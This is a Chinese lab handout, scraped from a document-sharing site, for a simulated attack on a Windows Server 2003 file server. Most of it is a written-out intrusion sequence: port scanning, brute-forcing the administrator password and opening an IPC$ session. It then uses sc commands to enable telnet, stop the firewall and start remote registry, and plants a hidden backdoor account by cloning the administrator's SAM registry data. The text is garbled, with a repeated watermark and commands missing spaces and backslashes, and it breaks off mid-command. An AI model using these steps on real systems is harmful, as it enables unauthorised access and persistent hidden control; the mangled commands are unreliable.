实验五-模拟黑客攻击

《实验五-模拟黑客攻击》由会员上传分享，免费在线阅读，更多相关内容在行业资料-天天文库。

1、word资料下载可编辑实验五模拟黑客攻击实验环境：本例以攻击一台文件服务器为例，演示通常的攻击方法和思路。该文件服务器默认安装了ｗｉｎｄｏｗｓ　ｓｅｒｖｅｒ　２００３，启动了ｗｉｎｄｏｗｓ防火墙但是允许文件共享。其余设置全为默认安装设置，并安装了所有补丁。专业技术资料word资料下载可编辑需求描述：Ø扫描目标计算机Ø获得管理员权限Ø安装后门Ø清除攻击记录实验步骤：一、扫描目标计算机a)在B计算机上使用扫描软件扫描目标计算机A，确定开放的端口，判断操作系统的类型。b)扫描软件推荐使用Ｘ－ｓｃａｎ或流光。X-SCAN：专业技术资料word资料下载可编辑专业技术资料wor

2、d资料下载可编辑使用流光：打开流光主界面---右击IPC主机---编辑---添加目标主机主机添加完后，生成字典---工具---字典工具---黑客字典III生成字典专业技术资料word资料下载可编辑右击目标添加的主机---探测---探测所有IPC$远程登录专业技术资料word资料下载可编辑配置字典探测报告一、获得管理员权限a)根据扫描结果，尝试暴力破解管理员账户的密码。b)Ｘ－ｓｃａｎ、流光、ＬＣ５等软件都提供了暴力破解功能。破解成功后会自动生成报告。二、入侵目标计算机a)使用管理员的账户建立ＩＰＣ链接，命令为＂netuse\1.1.1.1ipc$123456/u

3、ser:administrator＂。专业技术资料word资料下载可编辑a)使用SC命令获取目标计算机的所有服务列表，并保存在本地，命令为“sc\1.1.1.1querytype=servicestate=all>c:1.txt”b)打开1.txt文件，找到telnet，确认telnet服务的状态。c)去除telnet服务的禁用状态，设置为自动运行，命令为“sc\1.1.1.1configtlntsvrstart=auto”。然后启用telnet服务，命令为“sc\1.1.1.1starttlntsvr”。专业技术资料word资料下载可编辑a)停用目标计算机

4、的windows防火，命令为“sc\1.1.1.1stopsharedaccess”b)确认目标计算机启用了远程注册表服务，命令为“sc\1.1.1.1qcremoteregistry”，如果服务为停止状态，则将其启动。二、添加隐藏账户a)建立telnet连接，管理目标计算机，命令为“telnet1.1.1.1”，连接成功后输入管理员的账户名和密码专业技术资料word资料下载可编辑a)通过telnet，在目标计算机上建立隐藏账户，命令为“netuseryt$111/add”，其中“$”符号用于在命令行里隐藏账户，但是在图形化管理工具里该账户还是可见的。专业技术资

5、料word资料下载可编辑a)在本地运行“regedt32”，在“注册表编辑器”中选择“文件”——“连接网络注册表”。专业技术资料word资料下载可编辑a)打开目标计算机的注册表，右击“hkey_local_machine”项下“sam”子项下的“sam”子项，选择权限b)在SAM的权限窗口中，赋予管理员完全控制权限。断开与目标计算机注册表的连接，然后重新建立连接。专业技术资料word资料下载可编辑a)展开目标计算机的“hkey_local_machinesamsamdomainsaccountusersames”项，找到“administrator”和

6、新建的账户yt$，记录他们的类型，本例中“administrator”的类型为“0x1f4”，“yt$”的类型为“0x3eb”专业技术资料word资料下载可编辑a)展开目标计算机“hkey_local_machinesamsamdomainsaccountusersames”项下后三位是“1f4”的子项，该项和administrator项对应。专业技术资料word资料下载可编辑a)双击右侧窗格1f4项下的F键值，复制F键值下的全部数据。专业技术资料word资料下载可编辑a)展开目标计算机“hkey_local_machinesamsamdomai

7、nsaccountusersames”项下后三位是“3eb”的子项，使用从1f4项复制的数据覆盖“”项下F键值的数据。专业技术资料word资料下载可编辑a)导出目标计算机注册表的yt$项和000003eb项保存到本地，分别命名为yt.reg和*reg，然后将yt.reg和3eb.reg拷贝到\1.1.1.1c$下专业技术资料word资料下载可编辑专业技术资料word资料下载可编辑专业技术资料word资料下载可编辑专业技术资料word资料下载可编辑专业技术资料word资料下载可编辑a)返回到telnet命令行，删除目标计算机的账户yt$，命令为“net